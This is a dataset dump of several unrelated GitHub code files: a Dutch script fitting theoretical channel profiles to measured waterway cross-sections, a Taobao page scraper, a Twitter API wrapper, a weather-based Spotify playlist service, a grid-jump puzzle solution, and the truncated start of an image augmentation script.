filter_profiel_id\r\n\r\n q_punten = '''select pl.pro_id, pp.iws_volgnr, X(pp.GEOMETRY), Y(pp.GEOMETRY), pp.iws_hoogte, pl.hydro_id\r\n from profielen as pl inner join profielpunten as pp on (pl.pro_id = pp.pro_pro_id)\r\n where pl.pro_id = %d and pp.osmomsch = \"%s\" \r\n order by pp.iws_volgnr'''\r\n cur.execute(q)\r\n\r\n for proid, proident, hydro_id, streefpeil in list(cur.fetchall()):\r\n prof[proid] = {} # Er kunnen meerdere gemeten profielen per hydrovak zijn.\r\n prof[proid]['hydroid'] = hydro_id\r\n prof[proid]['peil'] = streefpeil\r\n prof[proid]['proident'] = proident\r\n prof[proid][\"orig\"] = []\r\n\r\n cur.execute(q_punten % (proid, profielsoort))\r\n for r in cur.fetchall():\r\n prof[proid][\"orig\"].append([r[2], r[3], r[4], r[5]])\r\n\r\n if len(prof[proid][\"orig\"]) > 0:\r\n # eerste en laatste punt 1000 meter hoger\r\n prof[proid][\"orig\"][0][2] = max(prof[proid][\"orig\"][0][2], streefpeil) + 1000.0\r\n prof[proid][\"orig\"][-1][2] = max(prof[proid][\"orig\"][-1][2], streefpeil) + 1000.0\r\n\r\n # Verrijk profielen met de projectie op een rechte lijn\r\n # prof verrijkt met de key \"proj\" met daarin een list van lists van afstand-geprojecteerd,\r\n # x-geprojecteerd, y-geprojecteerd en diepte\r\n lijn = shapely.geometry.LineString([(prof[proid]['orig'][0][0], prof[proid]['orig'][0][1]),\r\n (prof[proid]['orig'][-1][0], prof[proid]['orig'][-1][1])])\r\n prof[proid]['proj'] = []\r\n for p in prof[proid]['orig']:\r\n afstand = lijn.project(shapely.geometry.Point((p[0], p[1])))\r\n pr = lijn.interpolate(afstand)\r\n prof[proid]['proj'].append([afstand, pr.x, pr.y, p[2], p[3]])\r\n\r\n return prof\r\n\r\n\r\ndef interpoleerafstand(l, r, p):\r\n \"\"\"interpoleer de afstand op grond van de hoogtes\r\n Invoer: l = linker list met afstand, x, y en z\r\n r = rechter list met [a, x, y, z]\r\n p = z waarde tussen l[3] en r[3] in\r\n\r\n Uitvoer: tuple van afstand a en hoogte z\r\n \"\"\"\r\n factor = (p - l[3]) / (r[3] - l[3])\r\n return l[0] + factor * (r[0] - l[0]), p\r\n\r\n\r\ndef verrijkgemprof(cur, prof):\r\n \"\"\"Verrijk de tabel profielpunten met de afstanden zoals die in projecteerprofielen berekend zijn\"\"\"\r\n q = 'update profielpunten set afstand = %f where OGC_FID= %d'\r\n for proid in prof:\r\n for p in prof[proid]['proj']:\r\n if p[4] != 0:\r\n 
cur.execute(q % (p[0], p[4]))\r\n return\r\n\r\n\r\ndef mkmogelijktheoprofiel(talud, waterdiepte, bodembreedte, peil):\r\n \"\"\"Maak een shapely polygoon van het theoretisch profiel \"\"\"\r\n return shapely.geometry.Polygon([(0, peil), (talud * waterdiepte, peil - waterdiepte),\r\n (talud * waterdiepte + bodembreedte, peil - waterdiepte),\r\n (talud * waterdiepte + bodembreedte + talud * waterdiepte, peil)])\r\n\r\n\r\ndef mkrechthoekondertheoprofiel(rhlb, rhrb):\r\n \"\"\"Maak een shapely polygoon van een rechthoek onder het theoretisch profiel\"\"\"\r\n return shapely.geometry.Polygon([rhlb, (rhlb[0], rhlb[1] - 1000.0), (rhrb[0], rhrb[1] - 1000.0), rhrb])\r\n\r\n\r\ndef grootste(xy):\r\n index = 0\r\n m = 0\r\n for i in xy:\r\n if len(xy[i]) > 2:\r\n if (xy[i][-1][0] - xy[i][0][0]) > m:\r\n index = i\r\n m = xy[i][-1][0] - xy[i][0][0]\r\n return index\r\n\r\n\r\ndef mkgemprof(axyzlist, peil):\r\n \"\"\" Maak een shapely polygoon van het gemeten profiel (afstanden en diepte), doorsnijden met het peil\r\n helaas is split pas vanaf shapely versie 1.6 aanwezig (qgis 2.18 heeft shapely 1.2) daarom\r\n\r\n Invoer: list van lists met afstand, x, y en z\r\n peil\r\n Uitvoer: shapely polygon\r\n \"\"\"\r\n xy = {}\r\n tel = 0\r\n xy[tel] = []\r\n links = axyzlist[0]\r\n positie = 'b'\r\n for c in axyzlist[1:]:\r\n if positie == 'b':\r\n if c[3] < peil:\r\n xy[tel].append(interpoleerafstand(links, c, peil))\r\n xy[tel].append((c[0], c[3]))\r\n positie = \"o\"\r\n elif c[3] == peil:\r\n xy[tel].append((c[0], c[3]))\r\n positie = \"o\"\r\n else:\r\n if c[3] > peil:\r\n xy[tel].append(interpoleerafstand(links, c, peil))\r\n positie = \"b\"\r\n tel += 1\r\n xy[tel] = []\r\n elif c[3] == peil:\r\n xy[tel].append((c[0], c[3]))\r\n positie = \"b\"\r\n tel += 1\r\n xy[tel] = []\r\n else:\r\n xy[tel].append((c[0], c[3]))\r\n links = c\r\n if tel > 0:\r\n tel = grootste(xy)\r\n return shapely.geometry.Polygon(xy[tel])\r\n\r\n\r\ndef prof_in_prof(profgem, proftheo, aantstap=100, delta=0.001, obdiepte=0.001, debug=0):\r\n \"\"\"Het theoretisch profiel wordt in stapjes verschoven over het gemeten profiel (te beginnen links van het\r\n gemeten profiel zonder overlap, tot en met rechts van het gemeten profiel zonder overlap). Indien het\r\n theoretisch profiel nergens past binnen het gemeten profiel is de plek met het maximale oppervlak van de\r\n intersectie van het theoretisch met het gemeten profiel de optimale plek voor het theoretisch profiel,\r\n tenzij er een traject is met een gelijk maximaal oppervlak; in dat geval wordt het midden van dit traject de\r\n optimale plek voor het theoretisch profiel.\r\n Wanneer het oppervlak van deze intersectie gelijk is aan het oppervlak van het theoretisch profiel, dan\r\n past het theoretisch profiel volkomen binnen het gemeten profiel. 
In dat geval wordt het midden van het\r\n traject waarvoor het intersectie oppervlak gelijk is aan het oppervlak van het theoretisch profiel, de\r\n optimale plek voor het theoretisch profiel\r\n Invoer: profgem: het shapely polygoon van het gemeten profiel\r\n proftheo: het shapely polygoon van het theoretisch profiel\r\n aantstap: het aantal stappen dat gebruikt wordt voor de verschuiving van het theoretisch profiel\r\n delta: het acceptabele verschil om vast te stellen of twee oppervlakken gelijk zijn\r\n obdiepte: de diepte waarop de beschikbare overbreedte bepaald wordt\r\n Uitvoer: fit: de fractie van het oppervlak van het theoretisch profiel dat past binnen het gemeten\r\n optimaal: de optimale verschuiving (afstand) van het theoretisch profiel gemeten vanaf\r\n de start van het gemeten profiel\r\n fractie: 1 - de fractie van het gemeten profiel dat bedekt wordt door het theoretisch profiel\r\n overdiepte: de gemiddelde afstand onder rechte stuk van het theoretisch profiel tot het gemeten profiel\r\n linksover: de afstand tussen het gemeten profiel en het theoretisch profiel op obdiepte links\r\n rechtsover: de afstand tussen het gemeten profiel en het theoretisch profiel op obdiepte rechts\"\"\"\r\n\r\n waterbreedte_gemeten = profgem.bounds[2] - profgem.bounds[0]\r\n waterbreedte_theo = proftheo.bounds[2] - proftheo.bounds[0]\r\n waterdiepte_theo = proftheo.bounds[3] - proftheo.bounds[1]\r\n rhlb = proftheo.exterior.coords[1] # de linkerbovenhoek resp rechterbovenhoek van een rechthoek onder\r\n rhrb = proftheo.exterior.coords[2] # het rechte stuk van het theoretisch profiel (tbv overdiepte)\r\n oblijn = shapely.geometry.LineString([(0, profgem.bounds[3] - obdiepte),\r\n (waterbreedte_gemeten + 2 * waterbreedte_theo, profgem.bounds[3] - obdiepte)])\r\n if not oblijn.is_valid:\r\n logger.error('oblijn not valid. geom is: %s', oblijn.wkt)\r\n\r\n if not profgem.is_valid:\r\n logger.error('profgem not valid. 
geom is: %s', profgem.wkt)\r\n\r\n try:\r\n clijn = profgem.intersection(oblijn) # oblijn tbv overbreedte, clijn controle lijnstuk tbv overbreedte\r\n except TopologicalError as e:\r\n logger.error(e)\r\n return -99, -99, -99, -99, -99, -99\r\n\r\n gemprof = shapely.affinity.translate(profgem, -profgem.bounds[0], 0.0, 0.0) # op nul meter laten beginnen\r\n profzoek = shapely.affinity.translate(proftheo, -waterbreedte_theo, 0.0, 0.0) # verschuif naar nul overlap\r\n stap = (waterbreedte_gemeten + waterbreedte_theo + waterbreedte_theo) / aantstap\r\n zoekopp = profzoek.area # het oppervlak van het theoretisch profiel\r\n maxopp = -9.9 # het maximale oppervlak van de intersectie\r\n traject = '' # in traject komt per stap een 0 of 1 (1 indien maxopp == zoekopp)\r\n optimaal = -waterbreedte_theo # dit is de start van het theoretisch profiel, overlap is nul!\r\n fit = 0 # de verhouding maxopp / zoekopp (een goodness of fit)\r\n # logger.debug(\"wb_gem: %.2f, wb_theo: %.2f; stap: %.2f, zoekopp: %.3f\",\r\n # waterbreedte_gemeten, waterbreedte_theo, stap, zoekopp)\r\n for i in range(aantstap):\r\n profzoek = shapely.affinity.translate(profzoek, stap, 0.0, 0.0)\r\n inter = gemprof.intersection(profzoek)\r\n if abs(zoekopp - inter.area) < delta: # opp intersectie == zoekopp dus past profzoek volledig in gemprof\r\n optimaal = profzoek.bounds[0]\r\n maxopp = inter.area\r\n traject += '1'\r\n # logger.debug('Volledig: optimaal: %f; maxopp: %f', optimaal, maxopp)\r\n else:\r\n if inter.area == maxopp:\r\n traject += '2'\r\n elif inter.area > maxopp: # opp intersectie groter dan voorgaand oppervlak\r\n optimaal = profzoek.bounds[0]\r\n maxopp = inter.area\r\n traject = traject.replace('2', '0') # evt oud traject met kleiner oppervlak weghalen\r\n traject += '2'\r\n # logger.debug('Niet vol: optimaal: %f; maxopp: %f', optimaal, maxopp)\r\n else:\r\n traject += '0'\r\n fit = maxopp / zoekopp # de best fit\r\n fractie = (gemprof.area - maxopp) / gemprof.area # de overblijvende fractie oppervlak van het gemetenprofiel\r\n # logger.debug('Na loop: Fit: %.3f; optimaal: %f', fit, optimaal)\r\n # logger.debug(traject)\r\n\r\n if traject.find('1') > 0: # er zijn 1 tekens in traject\r\n traject = traject.replace('2', '0') # evt oud traject met kleiner oppervlak weghalen\r\n zoek = max(traject.split('0')) # in zoek komt de eerste langste reeks 1 tekens in traject\r\n astap = traject.find(zoek) + len(zoek) / 2.0 + 1\r\n optimaal = astap * stap\r\n optimaal -= waterbreedte_theo # corrigeer voor de verschuiving van het theoretisch profiel\r\n elif traject.find('2') > 0: # er zijn trajecten met een kleiner oppervlak\r\n zoek = max(traject.split('0')) # in zoek komt de eerste langste reeks 1 tekens in traject\r\n astap = traject.find(zoek) + len(zoek) / 2.0 + 1\r\n optimaal = astap * stap\r\n optimaal -= waterbreedte_theo # corrigeer voor de verschuiving van het theoretisch profiel\r\n optimaal += profgem.bounds[0] # corrigeer voor de verschuiving van het gemeten profiel\r\n # logger.debug(\"optimaal: %f\", optimaal)\r\n roth = shapely.affinity.translate(mkrechthoekondertheoprofiel(rhlb, rhrb), optimaal, 0.0, 0.0)\r\n poloth = profgem.intersection(roth)\r\n overdiepte = poloth.area / (rhrb[0] - rhlb[0]) # oppervlak gedeeld door breedte geeft diepte\r\n\r\n linksover = 0.0\r\n rechtsover = 0.0\r\n restbak = profgem.difference(shapely.affinity.translate(proftheo, optimaal, 0.0, 0.0))\r\n hlijn = restbak.intersection(oblijn) # restbak is restant gemeten profiel min theor. 
profiel\r\n if obdiepte < (profgem.bounds[3] - profgem.bounds[1]): # de obdiepte is hoger dan de bodem van het gemetenprofiel\r\n try:\r\n xlinks = clijn.coords[0][0]\r\n xrechts = clijn.coords[1][0]\r\n\r\n try:\r\n if len(hlijn) == 2: # is hlijn een MultiLineString van twee LineStrings\r\n if (hlijn[0].coords[0][0] == xlinks) and (hlijn[1].coords[1][0] == xrechts):\r\n linksover = hlijn[0].length\r\n rechtsover = hlijn[1].length\r\n elif len(hlijn) == 3: # is hlijn een MultiLineString van drie LineStrings\r\n # logger.debug(\"hlijn 3 stuks, xl, xr, hl\", xlinks, xrechts, hlijn)\r\n if (hlijn[0].coords[1][0] == xlinks) and (hlijn[2].coords[1][0] == xrechts):\r\n linksover = hlijn[1].length\r\n rechtsover = hlijn[2].length\r\n except:\r\n # logger.info(\"hlijn is geen MultiLineString\")\r\n pass\r\n except:\r\n # logger.info(\"clijn is geen LineString\")\r\n pass\r\n return fit, optimaal, fractie, overdiepte, linksover, rechtsover\r\n\r\n\r\ndef altertable(cur, tabelnaam, veldnaam, veldtype):\r\n \"\"\"\"Primitieve alter table voor float, integer, double met controle of het veld al bestaat\"\"\"\r\n gevonden = 0\r\n for r in cur.execute('pragma table_info(\"%s\")' % tabelnaam):\r\n if r[1] == veldnaam:\r\n gevonden = 1\r\n if not gevonden:\r\n cur.execute('alter table \"%s\" add column \"%s\" \"%s\"' % (tabelnaam, veldnaam, veldtype))\r\n return\r\n\r\n\r\ndef maaktabellen(cur):\r\n \"\"\"\"Maak de tabellen met verrijkte platgeslagen profielen tbv presentatie\r\n presentatie: klik op de kaart nabij een hydroobject en een profiel (selecteer dichtstbijzijnde,\r\n een hydroobject kan meer gemeten profielen hebben!!\r\n tabel hyob_voorkeurpeil geeft op grond van het id van het hydroobject het gekozen peil (kan natuurlijk\r\n ook als view, maar dit zal sneller zijn, geen idee of het van belang is)\r\n tabel profielfiguren is een platte tabel met alle info voor figuren met gemeten en theoretische profielen\r\n met infor over fit, overdiepte enz enz.\r\n\r\n Aanpassing van bestaande tabellen:\r\n hydroobject met voorkeurpeil\r\n profielpunten met afstand\r\n \"\"\"\r\n # altertable(cur, \"hydroobject\", \"voorkeurpeil\", \"float\")\r\n # altertable(cur, \"profielpunten\", \"afstand\", \"float\")\r\n\r\n # cur.execute('drop table if exists hyob_voorkeurpeil')\r\n # cur.execute('create table hyob_voorkeurpeil (id integer primary key, voorkeurpeil float)')\r\n cur.execute('drop table if exists profielfiguren')\r\n cur.execute('drop index if exists profielfiguren0')\r\n cur.execute('drop index if exists profielfiguren1')\r\n cur.execute('create table profielfiguren(id_hydro integer, profid varchar(16), type_prof char(1), coord text, '\r\n 'peil float, t_talud float, t_waterdiepte float, t_bodembreedte float, t_fit float, t_afst float, '\r\n 'g_rest float, t_overdiepte float, t_overbreedte_l float, t_overbreedte_r float)')\r\n cur.execute('vacuum')\r\n return\r\n\r\n\r\ndef controlefig(gemprof, theoprof, afstand, fit, fractie, overdiepte, overlinks, overrechts, hydroid, profid,\r\n talud, diepte, breedte, peil):\r\n fnm = 'cf/%d_%d_%d_%.2f_%.2f' % (profid, hydroid, talud, diepte, breedte)\r\n fnm = fnm.replace('.', ',')\r\n txt1 = 'Hydroid: %d, profid: %d, peil: %.2f; Talud: %d; Waterdiepte: %.2f; Bodembreedte: %2f.' % \\\r\n (hydroid, profid, peil, talud, diepte, breedte)\r\n txt2 = 'Fit: %.2f; Fractie %.2f, Overdiepte %.3f; Overbreedte links: %.1f; Overbreedte rechts: %.1f.' 
% \\\r\n (fit, fractie, overdiepte, overlinks, overrechts)\r\n blue = '#6699cc'\r\n orange = '#cc9933'\r\n fig, ax = plt.subplots()\r\n fig.text(0.95, 0.15, txt1,\r\n fontsize=7, color='black',\r\n ha='right', va='bottom', alpha=0.9)\r\n fig.text(0.95, 0.10, txt2,\r\n fontsize=7, color='black',\r\n ha='right', va='bottom', alpha=0.9)\r\n p2 = PolygonPatch(gemprof, fc=blue, ec=blue, alpha=0.5)\r\n ax.add_patch(p2)\r\n p1 = PolygonPatch(shapely.affinity.translate(theoprof, afstand, 0.0, 0.0), fc=orange, ec=orange, alpha=0.5)\r\n ax.add_patch(p1)\r\n ax.axis('scaled')\r\n savefig(fnm, dpi=200)\r\n plt.close()\r\n return\r\n\r\n\r\ndef doe_profinprof(cur0, cur1, aantalstappen=200, precisie=0.0001, codevastebodem=\"Z1\",\r\n obdiepte=0.001, debug=0, profiel_id=None):\r\n \"\"\"\r\n\r\n :param cur0: cursor naar de legger database\r\n :param cur1: cursor naar de legger database\r\n :param aantalstappen:\r\n :param precisie:\r\n :param codevastebodem:\r\n :param obdiepte:\r\n :param debug:\r\n :return:\r\n \"\"\"\r\n\r\n gemetenprofielen = haal_meetprofielen1(cur0, codevastebodem, profiel_id)\r\n\r\n # alleen theoretische profielen die liggen in hydro-objecten waar ook gemeten profielen zijn ophalen\r\n q = \"\"\"select id, id, talud, diepte, bodembreedte from varianten where hydro_id='%s'\"\"\"\r\n qm = \"\"\"insert into profielfiguren (id_hydro, profid, type_prof, coord, peil) values (%d, \"%s\", \"m\", \"%s\", %f)\"\"\"\r\n qt = \"\"\"insert into profielfiguren (id_hydro, profid, type_prof, coord, peil, t_talud, t_waterdiepte, t_bodembreedte, \r\n t_fit, t_afst, g_rest, t_overdiepte, t_overbreedte_l, t_overbreedte_r) values \r\n (%d, \"%s\", \"t\", \"%s\", %f, %f, %f, %f, %f, %f, %f, %f, %f, %f)\"\"\"\r\n for profielid, profiel in gemetenprofielen.items():\r\n try:\r\n # mkgemprof aanroepen met list van lists met afstand, x, y, z (geprojecteerd); en het peil;\r\n # levert een shapely polygoon\r\n gemprofshapely = mkgemprof(profiel['proj'], profiel['peil'])\r\n\r\n if gemprofshapely.is_empty:\r\n logger.warning('Profiel %s (%i) geeft een lege profiel geometry terug. 
skip profiel',\r\n profiel['proident'], profielid)\r\n continue\r\n\r\n h = qm % (profiel['hydroid'], profiel['proident'],\r\n gemprofshapely.wkt, profiel['peil'])\r\n # logger.debug(h)\r\n cur1.execute(h)\r\n cur0.execute(q % profiel['hydroid'])\r\n for theo_data in cur0.fetchall():\r\n # mkmogelijkprofiel aanroepen met talud, waterdiepte, bodembreedte en peil, levert een shapely polygon\r\n theoprofshapely = mkmogelijktheoprofiel(theo_data[2], theo_data[3], theo_data[4],\r\n profiel['peil'])\r\n # prof_in_prof aanroepen met gemetenprofiel, theoretisch profiel aantal stappen en aanvaardbaar verschil\r\n # (profielen bestaan uit shapely polygons)\r\n fit, afstand, fractie, overdiepte, overlinks, overrechts = \\\r\n prof_in_prof(gemprofshapely, theoprofshapely, aantalstappen, precisie, obdiepte, debug)\r\n\r\n cur1.execute(qt % (profiel['hydroid'], theo_data[1],\r\n shapely.affinity.translate(theoprofshapely, afstand, 0.0, 0.0).wkt,\r\n profiel['peil'], theo_data[2], theo_data[3], theo_data[4],\r\n fit, afstand, fractie, overdiepte, overlinks, overrechts))\r\n except Exception as e:\r\n logger.error('Fout in verwerken profiel %s (%i), hydrovak_id %s', profiel['proident'], profielid,\r\n profiel['hydroid'])\r\n logger.exception(e)\r\n\r\n cur0.execute('CREATE INDEX IF NOT EXISTS profielfiguren0 on profielfiguren(id_hydro)')\r\n cur0.execute('CREATE INDEX IF NOT EXISTS profielfiguren1 on profielfiguren(profid)')\r\n # cur0.execute('vacuum')\r\n resultaat = \"klaar\"\r\n\r\n return resultaat\r\n\r\n\r\nif __name__ == '__main__':\r\n import sys\r\n\r\n os.environ[\"PROJ_LIB\"] = \"/Applications/QGIS-LTR.app/Contents/Resources/proj\"\r\n os.environ[\"GDAL_DATA\"] = \"/Applications/QGIS-LTR.app/Contents/Resources/gdal\"\r\n sys.path.append('/Users/bastiaanroos/Library/Application Support/QGIS/QGIS3/profiles/default/python/plugins')\r\n\r\n conn = load_spatialite('//Users/bastiaanroos/Documents/testdata/leggertool/legger_hub_update_bastiaan2.sqlite')\r\n cur0 = conn.cursor()\r\n cur1 = conn.cursor()\r\n #\r\n resultaat = doe_profinprof(cur0, cur1, debug=True)\r\n print(resultaat)\r\n a = 1\r\n","repo_name":"hhnk-git/legger","sub_path":"utils/profile_match_a.py","file_name":"profile_match_a.py","file_ext":"py","file_size_in_byte":26469,"program_lang":"python","lang":"nl","doc_type":"code","dataset":"github-code","pt":"54"} +{"seq_id":"26351838512","text":"import dataclasses\nimport os\n\nfrom selenium import webdriver\nfrom selenium.webdriver.remote.webdriver import WebDriver\n\nfrom scrape_taobao.commands import ITEMS_DIR, PAGES_DIR, logger\nfrom scrape_taobao.core.fetch_item_page import fetch_item_page\nfrom scrape_taobao.core.hack import hide_browser_features, prompt_and_login\nfrom scrape_taobao.core.parse_item_page import parse_item_page\nfrom scrape_taobao.io import dump\n\n\ndef scrape_one(\n url: str,\n *,\n out_dir: str = ITEMS_DIR,\n pages_dir: str = PAGES_DIR,\n fmt: str = \"yaml\",\n download_only: bool = False,\n no_cache: bool = False,\n):\n \"\"\"\n 抓取商品页面,并解析商品信息。\n\n :param url: 商品链接列表文件,每行一个链接\n :param out_dir: 输出目录,默认为 '/cache/items'\n :param pages_dir: 页面源码目录,默认为 '/cache/pages'\n :param fmt: 输出格式,支持 'json' 和 'yaml'\n :param download_only: 是否只下载页面源码,不解析\n :param no_cache: 是否跳过缓存,即不使用已下载的页面源码\n \"\"\"\n\n os.makedirs(pages_dir, exist_ok=True)\n os.makedirs(out_dir, exist_ok=True)\n\n with webdriver.Chrome() as driver:\n hide_browser_features(driver)\n prompt_and_login(driver)\n\n try:\n scrape_one_impl(\n url,\n driver,\n out_dir=out_dir,\n pages_dir=pages_dir,\n fmt=fmt,\n 
download_only=download_only,\n no_cache=no_cache,\n )\n\n except Exception as e:\n logger.exception('failed to scrape \"{}\": {}'.format(url, e))\n\n\ndef scrape_one_impl(\n url: str,\n driver: WebDriver,\n *,\n out_dir: str = ITEMS_DIR,\n pages_dir: str = PAGES_DIR,\n fmt: str = \"yaml\",\n download_only: bool = False,\n no_cache: bool = False,\n log=logger.info,\n):\n \"\"\"\n Scrape a single item page from the given url.\n\n See also the docstring of `scrape_one`.\n \"\"\"\n item_id = url[url.index(\"id=\") :]\n page_filepath = os.path.join(pages_dir, \"{}.html\".format(item_id))\n out_filepath = os.path.join(out_dir, \"{}.{}\".format(item_id, fmt))\n\n # skip if item file exists\n if not no_cache and os.path.exists(out_filepath):\n log('skip scrape \"{}\" as existing'.format(item_id))\n return\n\n # skip if page source file exists\n if not no_cache and os.path.exists(page_filepath):\n # load page source\n page_source = open(page_filepath).read()\n\n log('skip fetch \"{}\" as existing'.format(item_id))\n\n else:\n try:\n # fetch page source\n page_source = fetch_item_page(driver, url)\n except Exception as e:\n log('failed to fetch \"{}\": {}'.format(url, e))\n raise\n\n log('fetched \"{}\" - {}'.format(item_id, driver.title))\n\n if not no_cache:\n with open(page_filepath, \"w+\") as f:\n f.write(page_source)\n\n if not download_only:\n try:\n # parse page source\n item = parse_item_page(page_source)\n except Exception as e:\n log('failed to parse \"{}\": {}'.format(url, e))\n raise\n\n dump(dataclasses.asdict(item), out_filepath, fmt=fmt)\n","repo_name":"limoiie/scrape-taobao","sub_path":"scrape_taobao/commands/scrape_one.py","file_name":"scrape_one.py","file_ext":"py","file_size_in_byte":3275,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"71540655521","text":"import json\nimport os\nfrom tweepy import API\nfrom tweepy import Cursor\nfrom tweepy.streaming import StreamListener\nfrom tweepy import OAuthHandler\nfrom tweepy import Stream\nimport re\n\n######################################################################################################################\n# Class TwitterAuthenticator\n# - Handles Twitter authentication and the connection to Twitter Streaming API.\n######################################################################################################################\t\nclass TwitterAuthenticator():\n\n def __init__(self):\n #Get the dictionary of twitter OAth keys\n self.this_folder = os.path.dirname(os.path.abspath(__file__))\n self.keys_file = os.path.join(self.this_folder, \"twitterKeys.json\")\n\n def authenticate_twitter_app(self):\n try:\n twitterKeyFile = open(self.keys_file)\n except OSError:\n print(\"Error! 
Cannot open: \", self.keys_file)\n\n twitterKeys = json.load(twitterKeyFile)\n\n #API key & API secret key goes here...\n auth = OAuthHandler(twitterKeys.get(\"consumer_key\"),\n twitterKeys.get(\"consumer_secret\"))\n\n #API Access token & secret token\n auth.set_access_token(twitterKeys.get(\"access_token_key\"),\n twitterKeys.get(\"access_token_secret\"))\n return auth\n\n######################################################################################################################\n# Class TwitterStreamer\n# - Class for streaming and processing live tweets.\n######################################################################################################################\t\nclass TwitterStreamer():\n\n def __init__(self):\n self.twitter_authenticator = TwitterAuthenticator()\n\n def stream_tweets(self, fetched_tweet_filename, hash_tag_list):\n \n listener = TwitterListener(fetched_tweet_filename)\n auth = self.twitter_authenticator.authenticate_twitter_app()\n\n stream = Stream(auth, listener)\n\n # This line filters Twitter Streams to capture data by the keywords: \n stream.filter(track=hash_tag_list)\n\n######################################################################################################################\n# Class TwitterListener\n######################################################################################################################\nclass TwitterListener(StreamListener):\n \n def __init__(self, fetched_tweet_filename):\n self.fetched_tweets_filename = fetched_tweet_filename\n\n def on_data(self, data):\n try:\n #Deserialize strin and create python object\n jsonTweets = json.loads(data)\n\n #Append to the file...\n with open(self.fetched_tweets_filename, \"a\") as f:\n json.dump(jsonTweets,f, indent=2)\n except BaseException as e:\n print(\"Error on_data: %s\", str(e))\n return True\n\n def on_error(self, status):\n # Check if we're being rate limited for making too many requests to Twitter\n if status == 420:\n return False\n print(status)\n\n######################################################################################################################\n# Class TwitterClient\n# - Client API functions\n######################################################################################################################\nclass TwitterClient():\n def __init__(self, twitter_user=None):\n self.auth = TwitterAuthenticator().authenticate_twitter_app()\n self.twitter_client = API(self.auth)\n self.twitter_user = twitter_user\n\n def get_twitter_client_api(self):\n return self.twitter_client\n\n #########################################################\n # Function get_user_timeline_tweets\n # - Gets the specified user's timeline tweets \n # - num_tweets is the # of tweets to get from timeline\n # - if no user, gets the API user's tweets\n #########################################################\n def get_user_timeline_tweets(self, screen_name, num_tweets):\n my_tweets = []\n for tweet in Cursor(self.twitter_client.user_timeline, tweet_mode=\"extended\", screen_name=screen_name).items(num_tweets):\n my_tweets.append(tweet)\n return my_tweets\n\n #########################################################\n # Function get_friend_list\n # - Gets the specified user's twitter friends \n # - num_friends is the # of tweets to get from timeline\n # - if no user, gets the API user's friends\n #########################################################\n def get_friend_list(self, num_friends):\n friend_list = []\n for friend in 
Cursor(self.twitter_client.friends, id=self.twitter_user).items(num_friends):\n friend_list.append(friend)\n return friend_list\n\n #########################################################\n # Function search_for_tweet\n # - search query string of 500 characters maximum\n #########################################################\n def search_for_tweet(self, query_str, count):\n #Check character count... \n if(len(query_str) >= 500):\n print(\"Exceeded Max character count in query!\")\n return False\n else:\n found_tweets = []\n for tweet in Cursor(self.twitter_client.search, q=query_str, count=count).items(count):\n found_tweets.append(tweet)\n return found_tweets\n","repo_name":"CUBigDataClass/covid-19-rhetoric","sub_path":"api/pythonTwitterAPI.py","file_name":"pythonTwitterAPI.py","file_ext":"py","file_size_in_byte":5226,"program_lang":"python","lang":"de","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"19795536481","text":"# PROJECT IMPORTS\nfrom src.domain.exceptions.exceptions import InvalidParamsWereSent\nfrom src.domain.models.weather.models import CoordinatesModel, CityModel\nfrom src.services.spotify.services import SpotifyPlaylistsService\nfrom src.services.weather.services import WeatherAPIService\n\n\nclass MainServiceWeatherPlaylist:\n\n @classmethod\n def get_playlists(cls, temperature: float) -> list:\n\n if temperature > 30:\n party_response = SpotifyPlaylistsService.party_playlist_objects()\n return party_response\n\n if 15 <= temperature <= 30:\n pop_response = SpotifyPlaylistsService.pop_playlist_objects()\n return pop_response\n\n if 10 <= temperature <= 14:\n rock_response = SpotifyPlaylistsService.rock_playlist_objects()\n return rock_response\n\n if temperature < 10:\n classic_response = SpotifyPlaylistsService.classic_playlist_objects()\n return classic_response\n\n @classmethod\n def get_service_response(\n cls,\n coordinate_model: CoordinatesModel = None,\n city_model: CityModel = None\n ):\n\n if coordinate_model.latitude and coordinate_model.longitude:\n weather_response, temperature = WeatherAPIService.get_weather_information_coordinates(\n coordinates_model=coordinate_model\n )\n\n playlist_response = cls.get_playlists(\n temperature=temperature\n )\n\n response_dict = {\n \"tracks_for_you\": playlist_response,\n \"about_your_weather\": weather_response\n }\n\n return response_dict\n\n elif city_model.city:\n\n weather_response, temperature = WeatherAPIService.get_weather_information_by_city(\n city_model=city_model\n )\n\n playlist_response = cls.get_playlists(\n temperature=temperature\n )\n\n response_dict = {\n \"tracks_for_you\": playlist_response,\n \"about_your_weather\": weather_response\n }\n\n return response_dict\n\n else:\n raise InvalidParamsWereSent\n","repo_name":"renatamoon/isis_api","sub_path":"src/services/main_service/service.py","file_name":"service.py","file_ext":"py","file_size_in_byte":2195,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"70681054241","text":"# 점프\n\nimport sys\n\ninput = sys.stdin.readline\n\nn = int(input())\narr = [list(map(int, input().split())) for _ in range(n)]\ndp = [[0] * n for _ in range(n)]\ndp[0][0] = 1\n\n\nfor i in range(n):\n for j in range(n):\n if i == n-1 and j == n-1:\n break\n \n temp = arr[j][i]\n if i + temp < n:\n dp[j][i + temp] += dp[j][i]\n\n if j + temp < n:\n dp[j + temp][i] += 
dp[j][i]\n\nprint(dp[n-1][n-1])","repo_name":"GGamangCoder/BOJ","sub_path":"1890.py","file_name":"1890.py","file_ext":"py","file_size_in_byte":452,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"54"} +{"seq_id":"71888054562","text":"import cv2\nimport numpy as np\nimport os\nimport random\nimport matplotlib.pyplot as plt\n\nfrom glob import glob\n\n# Rutas a las carpetas de imágenes y máscaras\nimage_folder = 'Final_dataset_small2/*/*.jpg'\nmask_folder = 'masks/*/*.png'\n\n# Obtenemos todas las imágenes y máscaras\nmask_files = glob(mask_folder)\n\nclass_index = dict(enumerate(os.listdir('Final_dataset_small2')))\nclass_index = {v: k+1 for k, v in class_index.items()}\n\n# Funciones de transformación\ndef translate_image(img, x, y):\n rows, cols = img.shape[:2]\n M = np.float32([[1, 0, x], [0, 1, y]])\n return cv2.warpAffine(img, M, (cols, rows))\n\ndef rotate_image(img, angle):\n rows, cols = img.shape[:2]\n M = cv2.getRotationMatrix2D((cols / 2, rows / 2), angle, 1)\n return cv2.warpAffine(img, M, (cols, rows))\n\ndef scale_image(img, fx, fy):\n # Redimensionar la imagen\n resized = cv2.resize(img, None, fx=fx, fy=fy, interpolation=cv2.INTER_LINEAR)\n \n # Verificar si la imagen 